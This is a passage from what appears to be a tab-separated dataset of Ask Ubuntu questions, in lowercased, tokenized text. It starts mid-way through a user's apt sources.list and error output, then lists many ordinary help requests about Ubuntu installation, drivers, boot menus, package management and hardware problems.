# 'partner ' repository . 49 # # this software is not part of ubuntu , but is offered by canonical and the 50 # # respective vendors as a service to ubuntu users . 51 deb http : //archive.canonical.com/ubuntu raring partner 52 # deb-src http : //archive.canonical.com/ubuntu precise partner 53 54 # # this software is not part of ubuntu , but is offered by third-party 55 # # developers who want to ship their latest software . 56 deb http : //extras.ubuntu.com/ubuntu raring main 57 deb-src http : //extras.ubuntu.com/ubuntu raring main 58 59 # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to 60 # newer versions of the distribution . 61 62 # # major bug fix updates produced after the final release of the 63 # # distribution . 64 65 # # n.b . software from this repository is entirely unsupported by the ubuntu 66 # # team . also , please note that software in universe will not receive any 67 # # review or updates from the ubuntu security team . 68 69 # # n.b . software from this repository is entirely unsupported by the ubuntu 70 # # team , and may not be under a free licence . please satisfy yourself as to 71 # # your rights to use the software . also , please note that software in 72 # # multiverse will not receive any review or updates from the ubuntu 73 # # security team . 74 75 # # n.b . software from this repository may not have been tested as 76 # # extensively as that contained in the main release , although it includes 77 # # newer versions of some applications which may provide useful features . 78 # # also , please note that software in backports will not receive any review 79 # # or updates from the ubuntu security team . 80 81 82 # # uncomment the following two lines to add software from canonical's 83 # # 'partner ' repository . 84 # # this software is not part of ubuntu , but is offered by canonical and the 85 # # respective vendors as a service to ubuntu users . 86 deb http : //archive.canonical.com/ubuntu quantal partner 87 # deb-src http : //archive.canonical.com/ubuntu quantal partner 88 89 # # this software is not part of ubuntu , but is offered by third-party 90 # # developers who want to ship their latest software . /etc/apt/sources.list.d/plexmediaserver.list 1 deb http : //plex.r.worldssl.net/plexmediaserver/ubuntu-repo lucid main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_plexmediaserver_ubuntu.list 1 # deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/plexmediaserver/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf disabled on upgrade to raring /etc/apt/sources.list.d/stebbins-handbrake-releases-quantal.list 1 # deb http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # disabled on upgrade to raring 2 # deb-src http : //ppa.launchpad.net/stebbins/handbrake-releases/ubuntu raring main # disabled on upgrade to raring after running the 2nd suggestions i got this error w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/raring/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/raring-security/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/raring-updates/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/raring-backports/release unable to find expected entry 'main/binary-i386ls/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead .
413896	smbus controller not enabled	i installed ubuntu 12.04 lts to a vmware workstation 10 box , and got the above error message . now i do n't know what to do .
413899	how to set bluefish as a default editor in filezilla	how to use bluefish as a default editor in filezilla ( ubuntu operating system ) . please give me solution . thank you
413900	ubuntu 12.04 lts version - default installation - how do you create new users ?	i am not able to create additional users other than the one which was created by default while installing ubuntu
413901	another dell e6400 touchpad problem	i just downloaded ubuntu 13.10 on my dell e6400 , i know this has been a big topic and do apologize ahead . i have tried all the information on here and google but with no luck occasionally my touchpad works fine . however most the time it will let me click on the menu bars but after that it is it , the pointer still moves just no button function . i have n't been able to update it because no matter what i do it will not connect to the internet wireless or ethernet which is another problem . so everything i download must be saved on a computer running ubuntu 10.04 and transfered however i can . i actually am close to giving up on it . any help would be greatly appreciated and i am fairly new to linux so bear with me . thanx in advance
413902	ldapadd : invalid format ( line 5 ) entry for ldap replication	i 'm trying to set up a ldap provider server , but facing problem with following command : sudo ldapadd -y external -h ldapi : /// -f provider_sync.ldif i followed all steps provided in this link , but still failing . i 'm getting this error ldapadd : invalid format ( line 5 ) entry : `` olcdatabase= { 1 } hdb , cn=config ''
413903	unable to install g++ & gcc compiler in ubuntu 13.10	i am trying to install g++ & gcc in ubuntu 13.10 ( 3.11.0-15-generic ) , its showing dependencies issue . how to resolve this
413904	can not change brightness on samsung rv411 laptop computer	i am using a samsung rv411 s03 laptop computer . i have tried several linux distribution on my laptop computer ; i have got a problem with them which is the brightness of the monitor can not be changed by any methods including using the fn key and up or down arrow keys and changing the grub property . i finally think the problem is caused by the driver program which is not installed because i have tried that when i was installing the windows 7 but it has be solved when i installed the driver program . however there is no corresponding driver program for linux . therefore i would like to ask for your help . thank you !
413907	black screen while installing on my laptop acer 3536 screen	0 down vote favorite during 32-bit ubuntu 12.04 lts installation on acer 3536 laptops , the back-light goes off and become unable to proceed . can anyone please provide a solution for the problem .
413908	audio over ethernet	i am not sure whether this is the right place for asking this question , but anyway i would like to give it a try . i want to transport audio over ethernet . i want to do a simple experiment with it . like from my computer , if i play an audio file , i should be able to hear it on a speaker which is connected via ethernet . is this possible ? please give me your inputs about it .
413910	instalation and accessing clam av antivirus in 12.04	i installed clam av anti virus for ubuntu . as i donât got exact clam av in repository i looked into this site `` http : //ubuntuforums.org/showthread.php ? t=1638141 '' . so as per instruction i run command line ( sudo apt-get install clamav ) , but the software ( clam av ) is not visible in my dashboard . i am a very new to linux please help me how can i see the gui and access it or uninstall it can any body suggest best running and effective open source anti virus for ubuntu .
413911	how to run already installed windows in ubuntu ?	i have a dell inspiron laptop with 300gb hard drive , in which i use 200gb for windows 7 and 100gb for ubuntu 12.04 . is there any way i could operate my windows 7 in ubuntu , because there are some applications which run in windows and every time i need to shut down ubuntu and restart using windows , making it a tedious job ?
413912	i ca n't install latest wine ( 1.7.8 )	please help me to install wine 1.7.8 on ubuntu 12.04 . i added ppa , updated but it installing for me 1.7.11 instead 1.7.8 ...
413913	coreect drivers for ati raedon hybrid graphics	i just bought a dell inspiron 15r 5521 laptop with i7 , and hybrid graphics ( intel hd 4000 with 2gb ati raedon hd 8730m . as expected , it ran into overheating problems when installing ubuntu . thats because of the missing graphics drivers . where do i get the graphics drivers for my laptop , ( which uses hybrid graphics , mind you ) . can i use the fglrx-updates , or the proprietary driver or something else ? please help . thanks for looking !
413918	`` missing operating system '' when booting from usb flash drive	arrghh ... so frustrated with this problem . today i downloaded the most recent ubuntu , being completely new to linux . my plan is to run it on a partitioned drive with windows 7 on a separate ssd . anyway i downloaded ubuntu 13.10 iso and then downloaded the pen drive linux usb installer . after using that to format my usb drive properly and then put the iso on the drive , i restarted and entered the boot menu via the post screen . i selected usb-hdd and it restarted as usual . but after post it came up with the message `` missing operating system '' on a black screen . i have also tried putting the flash drive to highest boot priority in the bios , to no avail . so does anyone have a solution to this problem ? i 've seen many questions on this before but nothing helps . regards
413921	permission denied ... ?	i tried apt-get update and upgrade together and this is what i got . e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? what should i do ?
413928	ubuntu 13.10 : how to disable nvidia graphics ( nouveau ) ?	i have a msi gs70 laptop with ubuntu 13.10 installed . unfortunately , my laptop has an nvidia graphics card , the only effect of which for me is constant fan noise , hot temperature of the laptop and drastical power drain ( powertop reports 36â40w instead of 24w ) . how do i disable this nvidia card ?
413929	using second life 's firestorm veiwer	i am a new user to ubuntu , so far , i am loving it . however , my ignorance of linux is really starting to show with this problem i fear . my son wants to be able to run second life using firestorm viewer . ok , no problem ... downloaded the linux version of the viewer . now the problem ... i am running the 64-bit ubuntu 13.10 . firestorm says i need to install the 32-bit linux compatibility client libraries in order to run . it gave me a list of the libs , none of which are still valid . so , what do i need to be looking at for 32-bit compat ?
413933	read-only file system error while creating a directory ?	i have got one of our production ubuntu machine setup by production unix team here in our company but somehow when i am doing like this - root @ machinea : /test01 # ls -lt ls : reading directory . : input/output error total 0 it is giving me an error and also if i am trying to create any directory in the promary01 directory , it is giving me an error as well - mkdir : can not create directory `/test01/primary ' : read-only file system any thoughts what is wrong ? i am thinking to fix this myself instead of telling unix prod guys as i have the root access with me as well and i will be able to learn something new as well . may be , it was not mounted properly ?
413937	how to download videos from any site using terminal based command ?	i want to download any videos form any site using terminal command , i know `` youtube-dl '' but it does n't download videos from some sites like khan academy so , what is the best for that ?
413940	using not replacing ms access in ubuntu	is there an app for ubuntu 13.10 that will allow me to use a ms access database ? i do not want to convert it because some of the machines on this network are still running windows . so i need to be able to access the access file , edit it , use it and save it in native ms access format from my ubuntu machine . i am not familiar with the apps available .
413942	how to install grub on an external hard drive ?	i am a complete newbie to ubuntu and despite several online searches , i ca n't find a solution to installing grub on an external hard drive . please help !
413946	maas-import-pxe-files error with md5sum	! [ i am building a private cloud maas using ubuntu 12.04 lts . i have some experience in previous cloud server with the same iso . but now i have got an error in running sudo maas-import-pxe-files . `` failled to verify md5sums via /usr/share/keyrings/ubuntu-archive-keying.gpg ( http : //archive.ubuntu.com/ubuntu//dists/quantal/main/installer-amd64/current/images//md5sums ) '' . and then command is stopped . what happen ? i have no idea to solve . give me some advice please . ]
413948	ubuntu 13.10 constant crashing	morning , i am a new user to ubuntu and linux in general . i have recently installed ubuntu 13.10 onto my system . this was difficult in its self as i had to make sure it was offline or it would fail on the grub installation constantly . i can get in and use the terminal but if i use anything else it freezes that screen then it freezes my mouse and i am unable to do anything e.g . access the terminal cancel some programs . literally nothing , i have to hard reset it . the freezing also happens if i just live boot it from my usb . any help would be greatly appreciated . configuration : intel i7 2770k 8gb ddr3 nvidia 590gtx 2.0tb hdd installation was via a usb drive . i used the installation process that was outlined on the ubuntu website however i did n't connect to the internet when installing . i received no errors when installing offline . if i connected before i installed then i would get grub 2 installation error . in a attempt to try and fix this i made sure everything is updated via the terminal and this was the same with the graphics driver however ubuntu just boots into blackness and all i have is a black cross for a mouse pointer .
413952	rsync -- link des from a file	i am attempting to create a simple backup script and i 'm struggling to get rsync to do incremental backups i do n't want it to overwrite files in the current backup but to link to the old one and if there 's anything different between my current files and the last backup to create a new one with only the changed files listed . so far i have tried the following command . rsync -argptcvn -- link-dest= 'cat /media/backup/ $ user/lastbackup.log' my command program adds the last successful backup name to a file called lastbackup.log ; what i want to do is to get -- link-dest to read the contents of that file before creating the next backup folder however unless i put the full file path into the -- link-dest path it shows the message -- link-dest arg does not exist : i have also tried using redirection to take the contents of the file however that fails with the same message .
413953	how can i set keyboard layout for the guest session ?	first , my ultimate goal is the same as in this question . i am a dvorak user , but i want qwerty , not dvorak , to be the default keyboard layout in a guest session . if you know a direct answer to that instead of to the question below , that will also be appreciated . i can change the keyboard layout to qwerty with setxkbmap -layout us . some googling tells me that if i create a shell script /etc/guest-session/prefs.sh , it will be run when the guest session starts . so i created a prefs.sh file containing just that command : setxkbmap -layout us what i expected to happen was to be able to run a guest session and automatically have the keyboard layout set to qwerty . what actually happened was that when i tried running a guest session , it simply failed and brought me back to the login screen . i must be misunderstanding something , but i do n't know what . any ideas ? if relevant : i 'm using ubuntu 12.04 .
413955	how can i get rid of the 'wl_80211_attach reg cfg80211 phy ' warning during boot ?	when i switch on my laptop a message on a black screen appears : [ ] info @ wl_80211_attach reg cfg80211 phy . it stays for only 1 sec , even if i try to type anything it will disappear after 1 sec and go to the login screen . is it something to do with wireless because my wi-fi network doesnât show up in the list . after when i connect the ethernet cable and refresh on my isp website , does my wi-fi connection gets established . lspci shows : 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) and rfkill list returns : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no
413956	lost file recovery from inaccessible operating system	i have been using photorec and testdisk to try and recover jpg files from lost operating systems ; windows 7 and ubuntu . currently i have a functioning ubuntu on the 1st 20 gb of the hard drive . the programs themselves have been partly successful . however , it fills my remaining memory with endless old files i do n't want , but can not delete : `` permission denied you are not the owner '' , meaning that i 'm unable to complete the recovery for lack of disk space . is there any way around this ?
413957	why does nvidia proprietary driver come down to 304.116 automatically ?	i installed nvidia proprietary drivers and before that completely uninstalled everything related to nvidia . i blacklisted the nouveau drivers also . after installation when i run nvidia-smi it shows the driver version 319.37 and i install cuda , pycuda which works . each time i restart the machine pycuda breaks and when i check nvidia-smi it shows driver version 304.116 . i am reinstalling almost everyday . why does it happen ? can anybody help please ? before installing drivers i added -- - sudo add-apt-repository ppa : ubuntu-x-swat/x-updates .
413958	install xubuntu in dual boot with win7 on the same hard drive	my situation is that i have 2 hard drives . one of them is the main hdd that i installed windows on and second one is 500 gb old hdd that i dug out of my old pc and i use it only for storage since it 's slow and makes noises when working . but the thing is , i noticed that whenever i install linux it installs it to this second disc and basically lags and freezes whenever i use it . i also do n't know the size of the first hard drive since my partitioning and messing with it caused the wrong size to be displayed , but i think it 's around 150-200gb . what i want to do is : completely wipe everything on my main drive , remove windows , restore the hdd to factory settings , then i want to run xubuntu and win7 in dual boot ( where xubuntu will be my main system and i only want a small partition for windows since i will only use it when i need to ) . so can anyone tell me the best way to restore my hdd to factory state , and to make sure that when i install both system they actually install to the same hdd ?
413960	how to zoom in while screencasting ?	is there a way i can zoom in where the cursor is , while screencasting , something like this : i presently using kazam on ubuntu 12.10 64-bit for screencasting . good alternatives which allow this feature are most welcome , but should allow for audio recording as well . p.s . : the original video here : how to use google drive as music player the screencaster i require should record video and not gif , the gif above is only for explaining what i need and is light-weight for au . i would like to have the screencaster have its own zooming ability and not application-specific zooming ability , i.e . i can zoom into firefox using ctrl++ . however , this wo n't work with all applications , i would like the screencaster to have this ability in itself or a generic zooming ability .
413963	ssh : connect to host 192.168.0.5 port 22 : operation timed out ?	i my ssh on my system is n't letting me connect from my remote system , i have ports 22 , 25565 and 10000 set to allow incoming connections on iptables , but when i connect it gives me the timeout error . i am only trying to connect to the internal ip of the system . it was working fine a few minutes before and i was adding some iptables rules to allow connections through port 25565 on the internal ip and i saved the iptables rules then restarted the computer from my remote system via ssh , and i could could n't connect back ? i can ping the system from my remote system without any errors on the internal ip , can somebody help ?
413964	quickly is not packaging my application ?	i ca n't package my quickly command line application , the following is the error output quickly package -- verbose shows the following output /host/cryptonite $ quickly package -- verbose running install_egg_info writing /tmp/tmp5mw39i/cryptonite-14.02.1.egg-info searching packages which provide required python modules : ca n't update changelog . an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : package command failed aborting
413967	error in installing anything	when i m trying to install vlc from the ubuntu software center the following error have been occured : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
413969	unable to install any software or packges on ubuntu 13.10	hey i am new on ubuntu i am trying to install flash plugin , packages and other software etc but finding these errors . rabia @ rabia-n150p-n210p : ~ $ sudo apt-get install ubuntu-restricted-extras [ sudo ] password for rabia : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rabia @ rabia-n150p-n210p : ~ $ sudo apt-get install ubuntu-restricted-extras e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rabia @ rabia-n150p-n210p : ~ $ sudo apt-get install flashplugin-nonfree e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rabia @ rabia-n150p-n210p : ~ $ what am i doing wrong ?
413974	unable to install package from terminal while connecting server ?	whenever i try to install something from terminal during installation i get this error . install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6-dev amd64 2.15-0ubuntu10.3 could not connect to 172.16.1.10:8080 ( 172.16.1.10 ) . - connect ( 110 : connection timed out ) help me out how to fix this ? why its connecting to 172.16.1.10 each time when i install something . ?
413977	dual boot reinstall problems	my ubuntu installation crashed during updating and will now not boot fully . i have tried reinstalling as from a previous answer on here suggested but the option to wipe my original ubuntu installation is not there . i do n't want to wipe my windows install , just reinstall the ubuntu partition . i assume this can this be done from the something else option - but there are lots of options when i go to 'edit partition ' which i 'm not sure about . i 'd think it should be an 'ext4 journaling file system ' and format the partition but thought i would check before messing with settings i do n't understand . thanks for any help !
413982	no access rights to dvd on brandnew system 13.10	probably a stupid beginner 's question : i set up a new lenovo thinkpad edge with ubuntu 13.10 and installed from dvd . now when trying to play a dvd i burned myself , i 'm getting a `` no permissions '' message . tried to change permission with `` sudo nautilus '' : when right-clicking on the dvd-drive and checking permissions , nautilus tells me that i am the owner of the drive , but i do n't have any permissions . when i try to change that , it tells me it ca n't because the drive is read-only . any hints here ?
413983	wine version portability with games	my wine version is 1.3.13 is it good to play high end games eg suplereme commander , crysis 2 in this version which i have.my microsoft office 2010 is working smoothly in this wine version.i have installed winetricks too . is their any latest version of microsoft office availabe of corse free for download . thankx
413984	should the spell-checher work with libreoffice base	i have been trying to set up a set of simple databases for various projects , that require large text entries . i wanted some thing quick and `` lite '' so tried glom but could not find any way of formatting text and no spell checker ! ! ? so reluctantly waded into base ( a real sledgehammer for some very small nuts ) only to discover that the spell checker available in the rest of the libreoffice is unavailable . is this really so ? ! ! ! ? or have i missed something . any advice ( not involving wine and azzcardfile ) would be appreciated . mike p
413986	problems setting up synch over wifi with windows program running in wine	i run epim in wine and at the moment i 'm trying to get the sync working . both devices are connected to the same wifi . but if i try to connect the android with the computer via the app i get `` unable to connect . check firewall settings on your computer . '' but the firewall is off . so i got gufw and added a rule for the ip address of my android phone . still wo n't work . i 'm running ubuntu 13.10 and wine 1.6 .
413990	want to convert ubuntu 12.04 desktop to server	i am totally new to ubuntu and i want my ubuntu desktop to be converted to a server . i searched the internet and got this : sudo apt-get install tasksel sudo tasksel remove ubuntu-desktop sudo tasksel install server apt-get install linux-server linux-image-server apt-get –purge remove lightdm providing all that went well , you can edit your /etc/default/grub configuration file to update the following settings : grub_timeout=5 ( comment out ‘grub_hidden_timeout’ ) grub_cmdline_linux_default=” '' grub_terminal=console ( only for pc ) sudo update-grub when the grub update has finished , you can reboot into ubuntu 12.04 lts server ! but after removing the desktop i am not able to install the server . any suggestions ? are these queries correct ?
413991	dual boot window in statrup	recently i have updated my windows operation system ( windows 8.1 ) . but after that the dual boot option in start-up has vanished now it 's only booting in only windows . how can i manage dual boot option like previous . i used easy-bcd , but there are some problem occurring in my ubuntu system . that 's why i uninstalled that . note : the ubuntu ( 13.04 ) is in another partition of hard drive . so there is no chance that it was deleted . please can u give me better sollution . thank you .
413993	how can i improve the cpu performance when i watch something on twitch in firefox ?	this is my htop output when i watch something on twitch : i use firefox . when i watch something on youtube , the cpu % -value is at about 10 ... or 20 % ( i installed intel support via a ppa , which i took from a guide on webup8.org ) . besides that , the video at twitch is stuttering , it is practically unwatchable . is there a problem in the way i set up this intel graphics support for flash ? or is there a problem with twitch 's flash stream ? either way , is there a way to improve the performance when watching something on twitch ?
413994	how can i play flash videos from youtube louder ?	some videos played in firefox just have a too little volume . i have already used alsamixer to turn up the volume to the maximum , and of course i 've also turned up the volume of the flash player to the max . some videos are still too low .
413996	get more screenlets not working	whenever i try to get more screenlets from the screenlets application it pops up with the browser telling me the screenlets.org is disabled . are screenlets deprecated ? am i missing something ?
413999	install ms fonts without using ttf-mscorefonts-installer	is it possible to install the ms fonts without using the ttf-mscorefonts-installer , and if so , how ?
414003	how to create video visualizations / sound responses for songs	simply i 'm wanting to create music visualization videos for songs i make for youtube ( like a stereoscope ) . i know it can be done using templates for adobe after effects on windows machines . is there any software / plugins for ubuntu that would provide this ? i use kdenlive for general video editing but it does n't look like it provides the kind of functionality for this requirement . i 've googled quite a bit but to no avail . something like this : http : //www.youtube.com/watch ? v=pticqtese64
414004	cant install fglrx ( proprietary ati driver ) for hd 8970m	i have an amd hd 8970m video card and ubuntu 13.10 . i 'm following these instructions to the letter , except that i of course use the latest non-beta amd drivers ( 13.12 ) instead of the old version mentioned in the guide . i get as far as running sudo aticonfig -- initial -f which comes back to me with aticonfig : no supported adapters detected when i run the driver shell script directly ( not the package option ) it says : your graphics adapter is not supported by this driver . installation will not proceed . what to do now ?
414005	installing ubuntu alongside windows 7 : is the default partitioning acceptable ?	i am very new to linux but keen to learn . i am moderately happy to use command line etc although i will not understand what i am typing ( yet ) . i have previously used ubuntu but not gone into any command line stuff . i will be doing an install of win 7 then installing ubuntu . my question : i see that the ubuntu installer will now auto detect the win7 installation , and will offer to install alongside . partitioning is done by dragging a slider between a single win partition and a single ubuntu partition . is this an ok way to do things , or is it very sub-optimal such that you would recommend manual partitioning ( to setup /swap etc manually ) ? thanks : )
414006	dpm in ubuntu 13.10	i 've read that amd radeon driver got dynamic power management support with linux which means that the gpu and memory clocks adjust dynamically based on load which is very useful for saving power . so my question is how to do that ? !
414007	does ubuntu run on samsung ativ one 5 style	i do n't find any information regarding ubuntu on the new all-in-one from samsung . it is a nice machine but i 'll only buy it if it runs ubuntu .
414008	the system network services are not compatible with this version	when i try to change my mac adress from terminal the i restarted pc the the wi fi disabled and i can not open it then i open network the it popup this message the system network services are not compatible with this version
414009	banshee 2.9 install in ubuntu	i 'm running ubuntu 13.10 amd64 , and i want to install the latest version of banshee which is 2.9.how ? what should i do ? i try apt-get update and then apt-get dist-upgrade but still the same version
414014	windows 7 is not booting even it is showing an option in ubuntu boot menu	i install ubuntu 12.4 lts with windows 7 on my machine . but when press enter on windows 7 which was showing in boot menu of ubuntu , it does nothing just come back to menu . apparently ubuntu boots perfectly fine , please help how to overcome this problem .
414017	how to downgrade a package using dpkg	i want to downgrade some packages . i search and find how to downgrade packages on ubuntu ? and this need to downgrade a package with many dependents and this how to downgrade a package via apt-get ? . but i just want to do it with dpkg . could i just run dpkg -i package-name ? i yes then what will be done with the highest already insatlled version ? !
414018	video not found skype	i just install skype 4.2 and i have ubuntu 13.10 the button for video call is just not there . my webcam is working fine when outside of skype what can i do to make video call with skype ?
414020	grub customizer inconsistent with actual boot menu	background : initially , i created a small partition on a hard drive to try ubuntu as an alternative to the previously installed windows xp . after finding ubuntu useful and running into space problems on that small partition , i created a new bigger one next to it and installed ubuntu ( same version ) there again . the boot menu was updated correctly after both installations but since i did n't need the smaller ubuntu partition any more , i deleted it - leading to a boot menu entry pointing to a non-existent installation . after learning about grub customizer , i was able to delete ( or hide , whatever ) the boot menu entry of the old ubuntu installation and set the new one as default , everything was fine . problem : after i received an update today ( kernel image or something , not sure how to find out what it was exactly ) , suddenly the old boot menu entries are back at system boot : an interesting detail is that since the update , the top two entries show the new kernel version 3.8.0-35-generic , even though the entry for the `` current '' ( existent ) ubuntu installation ( under which i received the update ) is the 6th from the top , i.e . the one on /dev/sdb7 , which still shows 3.8.0-29-generic . the grub customizer still showed the menu the way i had configured it previously ( removed 2 top entries pointing to the old ubuntu installation as well as the `` previous linux versions '' entry ) : i already tried running update-grub as found here , but this still seems to find the old ( 3.8.0-29-generic ) version , although i am unsure if they are really reported correctly : friendfx @ laptop : ~ $ sudo update-grub [ sudo ] password for friendfx : generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-35-generic found initrd image : /boot/initrd.img-3.8.0-35-generic found linux image : /boot/vmlinuz-3.8.0-29-generic found initrd image : /boot/initrd.img-3.8.0-29-generic found memtest86+ image : /boot/memtest86+.bin found microsoft windows xp professional on /dev/sdb2 done ... and , more importantly , after rebooting the menu at system boot is still the same , i.e . with the old and `` previous linux versions '' entries . question : what can i do to get the configuration i set in grub customizer to apply to the actual boot menu at system start ? did i miss anything obvious ?
414021	suspend test seems to have killed my intel nuc	i was running the daily live ubuntu 14.04-trusty-desktop-amd64 2014-01-24 on an intel nuc d34010wyk . it has 16gb ram and a crucial 240gb ssd . was working flawlessly , except for sound , so i started running the systems tests ( system > administration > system testing ) . when i executed the suspend test , the system did not automatically unsuspend after 60 seconds . it would not unsuspend by pressing the power button briefly . i can turn the nuc off by holding the power button down . but when i press the power button and power it back up , the screen ( s ) stay blank , with no input . i do n't get to see anything : not the intel nuc splash screen , nor anything of the visual bios . nothing . nada . basically , i ca n't power the machine back on . what do i do ? this is a horrible , horrible position to be put into . i never dreamed that linux would kill my new pc . i did some google searching , and tried using the procedure at http : //www.intel.com/support/motherboards/desktop/sb/cs-034211.htm under the settings were changed in bios section , guessing that perhaps buggy code altered the bios . for a while i thought it was going to work : i was trying for an opportunity to hit f2 during reboot to reset the bios to the factory defaults : i moved the bios yellow `` security '' jumper across to the pins to allow this , and by the time i switched the display over to hdmi input ( for the nuc ) , i was rewarded by seeing a grub boot screen , but in a weird display mode ( very large text , pale grey ) . i even started booting up ubuntu , and got to the point where it said /home was missing ( i had n't plugged in the external hdd ) , when i thought i should really reset the bios to factory defaults , first . so i did ctrl-alt-del to reboot , and got the intel nuc splash screen again - but nothing else . f2 did n't take me into bios setup , and the splash screen just stayed there . since then i have n't managed to get it as far as the grub boot menu , the best i can manage is to see the intel nuc splash screen , which just sits there . or if i move the jumper positions back to normal , i see nothing , just a blank screen when i power on . i 'm wondering whether i 'm going to have to risk trying to reset the bios to a recovery one , as per http : //www.intel.com/support/motherboards/desktop/sb/cs-023360.htm ; but i do n't know what filesystem to use for the usb key . i suppose fat would be the safest .
414022	ubuntu applications segfaults and filesystem remounts with readonly mode	i dropped a hard disk . after installing fresh kubuntu 12.04lts applications keeps segfaulting and filesystem remounts with readonly mode . i checked hard disk for bad sectors but none are found . /var/log/messages is empty and /var/log/dmesg contains nothing error like . is there a way to use this hard disk ?
414030	how can i tell banshee not to import .swf files	is there a way i can tell banshee not to import .swf ( flash ) files . i have lots of them and after importing my library i have to manually remove them .
414032	remove additional processes/services from ubuntu server	i just installed postgresql 9.1 and its packages : 'postgis and pgadmin ' on ubuntu server 13.10 . now i 'd like to remove any other processes/services on the server in order to improve its performance.. what is the most safe way to do that ?
414036	ubuntu stops booting	i am trying to install ubuntu 13.10 on a clean 80 gb hard drive ( no windows ) from a downloaded and burned copy ( from official site ) as a boot-able dvd . during the boot , as soon as the usb initialization finishes , i get the following ; caldera dr-dos 7.03 and then [ da - dos ] a : \ > a flashing block follows this . it seems to be waiting on an input response . maybe not but , that 's what it looks like . i have tried every single letter and number input that i can think of to no avail . there is not an 'a ' drive ( 3â˝ '' floppy ) installed on my computer and the bios is so marked in both the installed devices and in the boot sequence . the hard drive is empty . this is not a dual boot set-up . the ubuntu iso is booting from the dvd . it reaches a certain point and stops , seemingly waiting on an input is there a way to get past this stop ? i have seen the same problem posted before but the answers are of no help . this is not a dual boot problem . the dos mentioned is not microsoft dos . ubuntu 13.10 64-bit pc ( amd64 ) desktop iso is tailored for the cpu that i use . i found a post about the same problem from two years ago using ubuntu 11 point something . this is not a new situation . obviously not common but not new . look see . http : //answers.yahoo.com/question/index ? qid=20110819085436aai7rwf
414043	ubuntu 13.10 freeze problem when maximizing window	it does n't happen always . i 've been using ubuntu 13.10 for few months now- and have been noticing this problem last few weeks only . sometimes when i try to maximize a window by dragging it to the top edge of screen- i get a freeze . the only thing that moves is the cursor- and i have to hard restart my laptop by long-pressing power button- which damages the hard-drive everytime -_- can i get a fix to this please ? ?
414044	1gb ram installed , ubuntu 13.10 detects 992,4 mib	i have netbook running ubuntu 13.10 32 bit with 1gb ram installed , but when i go to `` about this computer '' shows only 992,4 mib ?
414045	ca n't boot ubuntu 13.10 after install fedora 20 on a x86_64 efi machine	i ca n't boot ubuntu from gub menu after i install fedora 20 ( but i can boot fedora and windows ) error : ca n't find command 'linux' error : ca n't find command 'initrd' but i can boot from here do you have any idea ?
414046	kerberos and google-authenticator ( 2-factor auth )	does anyone know how can i use google-authenticator in combination with kerberos and thus provide to my users 2-factor authentication ?
414048	some convenient note for random though or to-do list ?	i am looking for some application that can let me write down some to-do list for the day/week/month , or some random thoughts , and also is easy to access ( for example , it can be shown as an icon on the panel , which will expand to a window if i click it ( it is n't necessary to be that way ) ) and is small and light software . i may create a text file on the desktop for that purpose , but i have many text files on desktop already and i may mess them up . thanks !
414051	backup bootable recovery usb drive to image file	i have a bootable recovery usb stick made by dell 's recovery program . i would like to back up the drive to a file so i can use the usb stick for other purposes , and restore the recovery disk if needed . i saw solutions which suggested using dd to dump the entire device to an iso image . however , my usb stick is 16gb , but the recovery software only uses ~6gb , so the file comes out much larger than needed . i would like to back it in such a way that the output is similar to an ubuntu install disc , ie . an iso which uses only as much space as necessary that can be put onto any sufficiently large usb drive using standard tools such as dd . i was looking at partimage but it appears that it only backs up the partition , so the resulting image would not retain the boot info . is this correct ? what is the best tool for the job ? thanks !
414052	how to disable the built in mouse pad in a laptop ?	my touch pad is not functioning well , it make wrong moves even if i connect a usb mouse is there a tip to disable it and just use the usb mouse ?
414054	the brightness of my laptop reset every reboot ?	how to save the brightness in my laptop , so every reboot will stay the same and not changed .
414056	unable to boot after installing ubuntu 13.10	i bought a new asus 1015e notebook-320gb .it had no other os . i have installed ubuntu 13.10 from a usb drive and created partitions as /dev/sda1 fat 32 -- -- -mount point /boot/efi -- -248 mb /dev/sda5 ext4 mount point / -- -25598mb /dev/sda6 ext4 -- - -/opt 102398mb /dev/sda7 ext4 /home 102398mb /sda9 ext4 /usr 87374mb /sda8 ext 4 2gb swap partition after doing this it asked me to restart the system i did so but then it does n't boot.how should i specify the boot point if i created the above partition.also how to check if ubuntu was successfully installed . i am new to ubuntu . my notebook is not booting . please help me with this .
414057	ltsp plymouth theme	i want to install ( change ) the default plymouth theme for my ltp clients . update-alternatives -- install ... ... . do n't work in chrooted environment so i ca n't do it in the regular way . i suppose there is a special way to do that for ltsp . how to do that ? !
